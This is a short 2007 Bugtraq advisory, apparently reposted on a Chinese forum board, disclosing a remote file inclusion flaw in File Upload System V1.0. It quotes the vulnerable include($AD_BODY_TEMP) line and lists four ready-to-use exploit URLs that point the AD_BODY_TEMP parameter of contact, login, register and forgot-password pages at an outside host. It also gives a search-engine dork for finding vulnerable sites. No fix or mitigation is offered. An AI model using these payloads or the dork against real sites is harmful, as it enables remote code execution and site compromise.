File Upload System V1.0 (AD_BODY_TEMP) multiple file include

看板Bugtraq作者時間19年前 (2007/03/24 23:35), 編輯推噓0(000)
留言0則, 0人參與, 最新討論串1/1
============================ HItamputih Crew ==================== # hitamputih Advisory # Discovered By : IbnuSina & jipank #----------------------------------------------------------- # Software: File Upload System V1.0 # Script Demo: http://demo.free-php-scripts.net/File_Upload # Method: file inclusion # Thanks To : akukasih,nyubi,irvian,BlueSpy,kurt_kabayan and all #hitamputih crew [[Exploitz]]--------------------------------------------------------- ?php include($AD_BODY_TEMP);?> exploit : http://target.com/[PATH]/contact.php?AD_BODY_TEMP=http://injekan.lu http://target.com/[PATH]/login.php?AD_BODY_TEMP=http://injekan.lu http://target.com/[PATH]/register.php?AD_BODY_TEMP=http://injekan.lu http://target.com/[PATH]/forgot_pass.php?AD_BODY_TEMP=http://injekan.lu gugel dork : intext:"Marsal Design Co."
文章代碼(AID): #161KL000 (Bugtraq)